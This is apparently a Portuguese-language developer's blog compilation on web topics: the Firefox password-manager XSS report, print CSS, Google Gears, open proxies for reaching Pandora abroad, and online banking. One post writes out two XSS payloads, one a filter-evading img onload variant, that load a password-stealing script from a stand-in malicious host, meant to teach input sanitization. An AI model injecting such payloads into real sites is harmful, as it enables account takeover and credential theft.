fechaTag

Ei, está legal isso aqui: http://www.eyeos.info/

Não é útil, mas dá uma boa idéia a respeito do que é possível fazer.

Veja como essa notícia no Terra explica mal as coisas e espalha o terror:

A versão mais recente do navegador Firefox, a 2.0.0.5, possui uma falha em seu gerenciador de senhas que pode permitir o acesso a elas por sites maliciosos. O problema só se manifesta se o Javascript e o gerenciador de senhas estiverem acionados - o que é o padrão. Conforme o site Linux.com, a falha pode ser explorada com truques bastante antigos como o cross-site scripting, pequeno programa em um site que manipula objetos na máquina do usuário ou em outro site.

Quem tomar tempo para ler o anúncio da falha vai entender melhor. A falha não é no Password Manager. É uma falha de script-injection e XSS (cross-site scripting). Vou explicar em detalhes: se você tem um site em que os usuários inserem conteúdo, deve tomar cuidado para que eles não insiram javascript no conteúdo. Por exemplo, se os usuários cadastram uma descrição pessoal em seus perfis, e você simplesmente imprime esta descrição, corre sérios riscos. Alguém pode escrever, em sua descrição, algo como:

<script src="http://meusitemalicioso.com/scriptsqueroubamsenhas.js"></script>

Naturalmente, isso é muito perigoso! Não basta bloquear a tag script, você precisa se certificar de que o usuário não insira javascript na página de forma alguma. Por exemplo:

<img src="imagemqualquer.gif"
onload="document.getElementsByTagName('script')[0].src='http://meusitemalicioso.com/scriptsqueroubamsenhas.js'" />

Ou seja, é sua obrigação se certificar de que seus usuários não podem inserir javascript em nenhuma página de seu site. Isso porque o modelo de segurança do javascript está baseado na origem do script. Scripts numa página podem acessar qualquer coisa dentro daquele domínio. Então, se você permite que seus usuários usem a técnica acima, eles podem fazer com que os usuários que acessarem o perfil/post/comentário malicioso:

1. Tenham suas contas canceladas. Basta que o script crie um iframe oculto, carregue a URL de cancelamento de conta nele, aguarde alguns segundos e clique no botão "Sim, eu tenho certeza"
2. Tenham suas senhas modificadas. De novo, no frame oculto. Carregando o formulário de mudança de senha, preenchendo e submetendo. Se não houver validação de referer, isso pode ser feito inclusive sem o iframe, usando o objeto XMLHTTPRequest (via Ajax).
3. Enviem mensagens para todos os usuários do site, transfira todas as suas comunidades para um determinado perfil, veja o site em cor de rosa com uma foto do Reginaldo Rossi no logo e o que mais o agressor quiser.

Tudo o que eu descrevi acima funciona em qualquer navegador. Não se trata de uma falha no navegador, mas de uma falha no site. Bom, o que o pessoal da heise descobriu é que um agressor pode criar um formulário de login falso, e se você salvou a senha daquele site o Firefox, o Safari e o Konqueror vão preencher o formulário automaticamente. E esse formulário pode ser lido pelo script do agressor. Ora, o sujeito pode virar o site de ponta cabeça, claro que também pode acessar o formulário de login! E isso só não funciona no IE porque ele não tem um password manager

Ou seja, a falha não é do Firefox, mas do site, que permite acesso irrestrito ao atacante. É um site em que você não deveria confiar, que você não deveria acessar, ou pelo menos não deveria acessar com a mesma senha do seu cartão do banco. O fato de um navegador não ter password manager não vai tornar o site mais seguro. A conclusão a que chega o pessoal da heise:

Da perspectiva dos usuários, significa que eles não deveriam confiar suas senhas ao password manager em sites que permitem aos usuários criar suas próprias páginas contendo scripts.

Grande coisa! Você não deveria confiar, de maneira nenhuma, em sites que permitem aos usuários criar suas próprias páginas contendo scripts. Não é só seu password manager que está em risco, e não importa que navegador você está usando.

Acabo de criar um CSS de impressão para este blog. Levei uns dez minutos.

O código ficou assim:

form,#sidebar,iframe,#otop,#respond,.navigation,.rec6,.linkk{
display:none;
}
h2{
margin:0;
}
.entry{
line-height: 150%;
}
#header h1{
margin:0;
padding:0;
font-size:24px;
}
#header .description{
padding:0;
}
h2{
padding:40px 0 0;
margin:0;
}

E o resultado:

Em suma: você esconde tudo o que não pode ser usado ou não faz sentido no papel (menus, formulários, etc.) e tenta não atrapalhar o usuário. Aliás, não dá para fazer muito mais do que isso. Os mecanismos de impressão dos navegadores foram feitos para simplificar as páginas e economizar tinta.

Fácil, não?

Está todo mundo por aí falando sobre:

• Microsoft Surface, um computador-mesa realmente impressionante. Entre no site e veja alguns dos videozinhos que você vai entender.
• Google Gears, uma extensão para Firefox/Internet Explorer que permite ao desenvolvedor web guardar dados locais, na máquina do usuário.
• O Orkut agora permite que você cadastre feeds em seu perfil.

Quando olhei cada um desses lançamentos, tive a mesma reação: "Ah, grande coisa!"

Nenhuma dessas idéias é nova ou revolucionária. Começando pelo Surface, é uma coleção de idéias velhas. Já vimos parte delas implementada no iPhone e na maneira como o sujeito pode usar os dedos nele. A idéia de colocar um computador numa mesa ou permitir seu uso por mais de uma pessoa também não é nova. E a maquininha da Microsoft está saindo por 10 mil. Dólares.

O Google Gears merece um pouquinho de explicação antes de dizer que a idéia não é nova. O Gears tem três componentes importantes. O primeiro é um tipo de servidor proxy com cache local. É um pouquinho mais do que isso, mas no fim permite a uma aplicação web responder dados ao usuário uma única vez, e ele terá esses dados em sua própria máquina a partir daí. O segundo é um banco de dados local, que permite a uma aplicação web, por exemplo, funcionar offline. O terceiro é um mecanismo para fazer com que seus scripts possam ser executados em segundo plano, sem congelar o navegador. De verdade? Isso não é nem tão novo, nem tão revolucionário assim. Para o sujeito que está desenvolvendo um Gmail, pode fazer diferença. Mas para pequenas aplicações, ou mesmo as medianas, dessas que a gente desenvolve todo dia, tudo poderia ser resolvido com cookies e um pouquinho de inteligência, sem demandar a instalação de um plugin.

Por fim, os feeds no Orkut. Aqui a experiência de quem esperava algo realmente novo pode ser decepcionante. Leia os comentários do Charles Pilger sobre o assunto, por exemplo.

Apesar disso, há algo que pode realmente fazer diferença nesse tipo de produto: massa crítica, quantidade de usuários, visibilidade. O Surface pode mostrar ao mundo a idéia nova. Talvez eu nunca venha a ter um Microsoft Surface, mas quem sabe eu daqui a algum tempo comecem a vender o XingLing Surface, o Itautec Surface ou o Positivo Surface? Tenho perguntado ao auditório, nos Encontros Locaweb, quem usa leitores de feeds e quem fornece RSS de qualquer maneira. Num público de desenvolvedores, o número de pessoas que levantam suas mãos é assombrosamente baixo. Imagino que entre os seres humanos comuns este números deve ser ainda menor. Feeds no Orkut podem ser um excelente recurso educativo. Isso pode fazer muita gente descobrir o RSS.

Em relação ao Gears, assim como em relação ao Silverlight, que não está na lista acima porque já tem um tempo, acontece algo curioso. Quem teria coragem de apostar hoje numa tecnologia que exige a instalação de um plugin para que seu site seja usado? Se fosse qualquer empresa pequena que estivesse lançando um desses produtos, ele logo seria descartado como algo ridículo. Mas todo mundo tem suas em relação ao poder de empresas como a Microsoft ou o Google de fazer com que as pessoas instalem algo em suas máquinas.

Em suma, quando você tem metade da Internet usando seus produtos, as regras podem ser diferentes para você. E quando você lança um Google Notebook ou um Zune, as pessoas parecem se esquecer muito rápido que você fracassou.

Em relação ao fato de não haver nenhuma novidade nesses produtos, vale lembrar o que diz o Getting Real: uma boa idéia não vale quase nada, o que vale mesmo é uma boa execução. Embora o Surface não seja novo, parece pelos vídeos que foi executado de maneira exímia.

E, claro, a história dos computadores mostra que nem sempre os melhores vencem. Nada de certezas, por enquanto.

Links interessantes:

• Començando com o Google Gears
• A tecnologia tem que ir aonde o povo está.

How to: Access Pandora from outside the US

Vou explicar aqui em português os métodos 1 e 2:

1. Firefox + anonymous proxy: o truque é simples, você visita um dos seguintes sites:
   http://tools.rosinstrument.com/proxy/
   http://www.publicproxyservers.com/

   http://www.proxz.com/
   http://www.stayinvisible.com/
   E lá você encontra o endereço de um servidor proxy aberto. Encontrando, basta ir no Firefox em Editar > Preferências > Avançado > Rede > Configurações e configurar lá o servidor proxy escolhido. A tela é mais ou menos assim:

   

2. Usando um proxy CGI público: a solução acima tem resultados melhores, mas está é bem mais prática. Não precisa configurar nada, entre neste site, escolha um servidor proxy na lista, digite o endereço do site a visitar (pandora.com) e navegue.

Os métodos são os mesmos que foram usados para acessar o YouTube quando ele foi bloqueado, e são os mesmos que você pode usar para acessar qualquer outra coisa que seja bloqueada em seu país ou em sua rede.

Antes que chovam comentários perguntando: sim, se o administrador de sua faculdade não bloqueou os open proxies, deve servir para você acessar o Orkut bloqueado de lá. Já o MSN bloqueado é mais complicado, mas você pode tentar acessar, via open proxy, o Meebo. De qualquer maneira, você não devia fazer isso. A rede é da faculdade, e eles é que mandam lá. Deve ter uma lan house aí na esquina onde você pode perder seu tempo no Orkut com tranqüilidade.

Dashboard, Exposè, estilo Aqua, tudo já foi copiado no elegante Mac OS X. Mas a marca registrada do sistema ainda é o Dock. Há uma porção de cópias interessantes para o Dock em diversos ambientes. Mas, com javascript e CSS, eu nunca tinha visto uma razoável. Até que vi essa aqui. Veja esse Dock rodando nesse exemplo.

Muito bom. Tanto o código quanto o resultado visual.

Ah, se você tiver um tempinho para estudar o código, vai passar a odiar um pouquinho mais o Internet Explorer

Como todo mundo anda elogiando, resolvi testar o Songbird. O programa é lindo! Mas eu acho que ainda não vou conseguir usá-lo. Talvez eu não tenha entendido direito o funcionamento do programa, e algum leitor mais esperto do que eu possa me ajudar.

Eu entendi errado ou o Songbird não entende feeds de Podcast? Só consegui pedir ao programa para assinar o conteúdo de uma página, que carregue no navegador, não um feed XML. No caso de feeds que possuem uma folha de estilo XSLT para o navegador, como os do Feedburner, a coisa funciona porque o Songbird os entende como uma página web:

Já se o arquivo XML não tem nenhuma mágica associada a ele, veja o que acontece:

Ou seja, eu preciso visitar o site, e mandar o Songbird "assinar" a página que contém a lista de arquivos mp3. Há uma série de problemas com essa abordagem:

1. Nem todos os feeds tem uma página HTML que liste os arquivos. Estes eu não posso assinar.
2. O endereço da página pode mudar. Não deveria, claro, "cool URI don't change" certo? Mas pode. E muita gente publica conteúdo só no feed, exclusivo para quem assina.
3. Preciso navegar na minha coleção de podcasts e repetir este processo um a um.
4. Por falar nisso, não há uma maneira de importar meu OPML. Incluir os podcasts um a um não é divertido. E como ele também não exporta, usar o Songbird significaria repetir o processo no dia em que eu resolvesse migrar para outro programa.

Ou seja, por enquanto ainda não vou me arriscar com o Songbird. É um projeto open source, baseado em XUL, logo é muito fácil criar extensões para ele e melhorá-lo. Qualquer um que saiba javascript pode colaborar. Quem sabe eles não resolvem isso rápido?

Depois de muito confabular, chegamos a uma conclusão a respeito do Desafio dos 4KB.

O vencedor é o Michael Humberto Castillo, com seu joguinho. Demoramos a decidir porque o joguinho tem uns bugs, mas foi o mais impressionante que foi enviado. Como o critério, segundo o anúncio da promoção, era a quantidade de barulho produzida pela reação emocionada do pessoal aqui, não conseguimos deixar de premiar o Humberto, apesar dos pequenos bugs. Parabéns Humberto! Aguarde nosso contato.

Parabéns também a todos os outros participantes! Foi muito divertido.

Deixei o micro ligado durante a noite. Não estava navegando nem fazendo nada de especial, só ficou ligado. Quando fui tentar usá-lo pela manhã, estava muito, muito lento. Talvez o usuário de Windows ache que estou de frescura, afinal, isso é assim mesmo, basta um reboot e tudo se resolve. Mas deixe-me dizer que no Linux as coisas são diferentes. Minha máquina no escritório fica meses ligada, sem reboot, sem lentidão. Se está lento, tem alguma coisa errada. Pois veja:

Firefox consumindo 297MB de RAM. Como meu notebook só tem 512MB de RAM, e parte disso é compartilhada com a placa de vídeo, 297MB é muita, muita RAM.

Fechei o Firefox. A janela fechou e o programa levou dois minutos para fechar e liberar a memória. Enquanto isso, consumiu tudo o que pode de CPU:

Quando o programa finalmente morreu, o alívio foi imediato:

Pronto, abri o Firefox de novo, e tudo parece normal:

Alguém tem idéia do que seja isso? Algum plugin ou extensão?

Caramba, olha isso!

O treco não foi feito com OpenGL ou DirectX, os objetos são implementados com a tag canvas e os cálculos de 3D são feitos pelo próprio Javascript. Definitivamente, temos poder de processamento sobrando hoje em dia.

O Bruno começou: Bradesco: O pior internet banking que eu já vi.

É mesmo, de longe, o pior que eu conheço. Sou cliente Bradesco e Itaú há um bocado de tempo. Mantenho minha conta no Bradesco por uma série de motivos. Primeiro, porque eles me ofereceram crédito pessoal, cartão de crédito, cheque especial e uma porção de outras facilidades, sem que eu precisasse ir até o banco pedir. Sei que eles não fazem isso por bondade, que é interesse do banco que eu me endivide e pague juros a eles. Mas no Itaú, tendo praticamente o mesmo tempo de conta e tendo durante alguns anos movimentado mais dinheiro lá do que no Bradesco, não tenho nem talão de cheques. Eu sei que se for à agência pedir é capaz de conseguir essas facilidades, mas, caramba, tenho que ir à agência?

Há outros motivos para manter minha conta no Bradesco. Embora seja considerado um "banco das massas" e muita gente reclame das filas, tenho tido muita sorte com o atendimento deles na agência. A rede de caixas eletrônicos também é exemplar. Onde eu vou tem um caixa Bradesco Dia e Noite. E, se não tiver, eles ainda têm convênio com a rede 24 horas, embora aí eu pague para sacar. Isso é bem melhor que o sistema do Itaú, onde eu só posso sacar em caixas eletrônicos do próprio Itaú, tenho um limite (pequeno) de saques por mês e, se sacar além do limite, pago uma tarifa por cada saque extra. Além disso, se faço um saque em qualquer caixa eletrônico fora da agência, num supermercado, posto de gasolina ou rodoviária, por exemplo, também pago por aquele saque. Além disso, as tarifas no Itaú são um assalto!

Me sinto entre a cruz e a espada com os dois bancos.

Um ponto para o Bradesco: Uma vez perdi meu cartão do Itaú. Tive que ir até a agência para assinar uma solicitação de um novo. O gerente me deu um prazo, mas a única maneira de saber se o cartão já havia chegado era telefonar para o gerente ou ir até a agência. Acontece que ninguém consegue telefonar para o gerente. Quando o cartão finalmente chegou, o gerente me entregou o cartão e me disse que eu tinha que cadastrar uma senha para liberar o cartão para uso. E para isso, tinha que pegar a fila do caixa. Era o quinto dia útil do mês, a fila era uma daquelas que quase não cabe na agência. No Bradesco, quando meu cartão quebrou, fiz o pedido de um novo por telefone e o recebi em casa.

Um ponto para o Itaú: há pouco tempo eu me mudei e resolvi transferir as contas para uma agência perto de casa. No Itaú a moça digitou meia dúzia de coisas no computador, me deu um único documento para assinar e colou um adesivo em meu cartão com o número da nova conta. Pronto, a conta estava transferida e eu já podia movimentá-la. No Bradesco me pediram uma carta, de próprio punho, solicitando a mudança, me deram um documento de encerramento da conta antiga para assinar, mais toda a papelada de abertura de uma conta nova. Maços e maços de papéis para assinar. Aliás, o Bradesco parece que adora gastar papel. Está bem que eles trabalham com papel reciclado, mas acho que eles fariam mais bem à Natureza se simplesmente poupassem a metade do papel que gastam.

No fim, não sei que banco escolher. Não se também se abro uma conta em um outro e encerro as duas que tenho.

Agora, falando em políticas de segurança, o Bradesco realmente é o campeão da chateação. Uma vez minha esposa telefonou para o Fone Fácil, que devia se chamar Fone Difícil. Ela não estava acostumada às confirmações de cadastro. Aqui em casa, quando a gente precisa telefonar para a companhia telefônica, o banco ou qualquer outro fornecedor de serviços, geralmente sou eu que faço. Você nunca foi pego de surpresa quando perguntam sua idade? Principalmente perto do seu aniversário? Foi o suficiente para bloquearem a conta dela e ela ter que ir até a agência para resolver o problema.

Esse tal "Cartão Chave de Segurança Bradesco" é a coisa mais famigerada que já inventaram. O Itaú tem um igualzinho, mas o Bradesco me pede o cartão para acessar também o Fone Fácil, que devia se chamar Fone Difícil, e para fazer saques no caixa eletrônico.

Preste atenção nos passos para saber meu saldo no Internet Banking:

1. Acesso o site do Bradesco.
2. Digito agência e conta e Enter.
3. Espero, dependendo da conexão muito, até carregar um applet Java.
4. Digito minha senha eletrônica (não é a mesma do cartão para saque) usando o teclado virtual.
5. Digito minha frase secreta (pelo menos 22 letras) e Enter
6. Aparece uma tela me pedindo um dos números do meu cartão chave. Tiro o cartãozinho odioso da carteira, encontro e digito o número pedido e Enter.
7. Pronto, aparece meu saldo. Viu como é fácil?

Um cliente Bradesco tem:

1. Uma senha do cartão de débito
2. Duas letras secretas para usar o caixa eletrônico
3. Uma senha eletrônica para Internet e Fone Fácil
4. Um cartão de segurança com 70 números

E de vez em quando ainda te pedem para confirmar dados pessoais em algumas operações.

Por fim: estava tentando testar um serviço novo, o NovoFax, mas não consegui porque o sistema da Visa me manda para o Bradesco quando tento fazer uma compra, e, embora o site e o Internet Banking funcionem no Firefox, os sistemas de pagamento eletrônico não. Estou pensando aqui se assino via boleto ou simplesmente desisto.

Vídeo interessante, em português, mostrando um Desktop 3D Linux:

Inspire Yourself: 50 Remarkable Favicons | Smashing Magazine

Da uma olhada na seção "squares", você vai ver o favicon do iMasters. Parabéns ao pessoal do iMasters!

Acabo de bloquear na Adblock a seguinte url:

http://spa.snap.com/snap_preview_anywhere.js?*

Caramba, mas que negocinho chato esse, né? Fica pulando na sua frente quando você passa o mouse sobre o texto. Não consigo ler com isso aí não.

Acabo de conhecer, através do BrPoint, a Performancing, empresa que produz ferramentas para blogs e que acaba de ser comprada pela Pay Per Post. Instalei a extensão Performancing para o Firefox, e estou muito bem impressionado. Estou escrevendo este post nela. Se ele for para o ar, e você chegar a lê-lo, é sinal de que a extensão realmente funciona.

Segue um screenshot:

Um bocado de gente começou recentemente a usar o Cite Bite para linkar para citações de outros sites. A citação pode ficar, por exemplo, assim:

PS: Se você tem talento e disposição para criar uma “mensagem-modelo”, com campinhos para preencher e enviar, principalmente para os tribunais, por favor faça isso. Você vai estar ajudando muito com um pouquinho de seu tempo.

Elcio Ferreira

Clique no link com meu nome e você vai entender o que é o Cite Bite. O recurso parece interessante à primeira vista. O problema é que isso quebra um dos mecanismos básicos da interação entre os blogs: o link.

Quando você linka para um outro blog você está favorecendo o blog linkado:

1. Está enviando usuários para lá. Esse é, claro, o ponto mais óbvio.
2. Está enviando um pingback. Isto é, se o seu sistema de blogging for esperto o suficiente para isso. Se você não sabe o que é pingback (e trackback) entenda isso melhor aqui.
3. Está dando pontos ao site no Google Ranking. E o Google funciona por causa dessas milhares de pequenas contribuições voluntárias, os links. Cada link é um voto.

Nada disso aí acontece quando você linka para o Cite Bite. Vai haver um link a menos para o blogueiro que escreveu algo tão bom que merece sua citação.

Para complementar, o Cite Bite pode causar problemas para o seu usuário. Aquela barra vai causar problemas se o site linkado coloca coisas no topo usando, no CSS, position:absolute; e os javascripts e mesmo o layout do site podem não funcionar corretamente.
Linke direto para o blogueiro, a fonte original.

• Quero brincar disso também! Como faço?
• Se você se impressionou com o SVG, dê uma olhada no que andam fazendo com a <canvas />.
• iPhone e o LG KE850, e agora Steve?
• Testei esse tal de exaile. Muito bom mesmo! Estou para tirar um tempo e dar uma olhada no fonte. Como é Python, vamos ver se me animo a fazer alguma coisa legal com ele.
• Pronto. Era só o que faltava. Se bloquearem o Orkut a coisa vai ficar perigosa. É capaz de haver uma guerra civil

Olha isso!

Feito com Inkscape.

Com Internet Explorer, você provavelmente não vai conseguir ver nada. Tente o Opera ou o Firefox.

E por falar em SVG, eu não poderia deixar de linkar para isso aqui: The Road to KDE 4: SVG Rendering in Applications

Se o KDE 4 for metade do que andam dizendo, vai me fazer voltar a usar KDE.

Este blog agora tem hCard, geo e tags. Entre aqui com a Operator e você vai ver.

O endereço e as coordenadas geográficas apontam para a Visie, cujo site em breve vai estar recheado de microformats também.

Se você não entendeu nada, leia mais aqui.